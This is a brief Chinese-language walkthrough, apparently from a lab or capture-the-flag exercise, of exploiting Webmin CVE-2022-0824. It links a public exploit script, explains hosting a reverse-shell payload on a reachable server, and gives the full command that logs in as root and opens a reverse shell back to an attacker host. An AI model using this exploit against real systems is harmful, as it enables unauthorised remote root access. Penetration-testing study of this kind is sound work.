可以看出来这是一个webmin的登录后台webmin,搜索payload脚本
https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell
Webmin 是一个基于 Web 的 Unix 系统管理界面。使用任何现代网络浏览器,您可以设置用户帐户、Apache、DNS、文件共享等等。 在 1.990 之前的 GitHub 存储库 webmin/webmin 中对远程代码执行的访问控制不当。
构造反弹脚本,可以为任意语言的反弹脚本,主要根据目标服务器所拥有的语言类型
在具有公网ip的服务器上构建,因为目标服务器需要能够请求到当前服务器进行下载反弹shell脚本
python3 Webmin-revshell.py -t http://192.168.0.103:21290 -c root:password -LS 192.168.0.105:9090 -L 192.168.0.105 -P 9999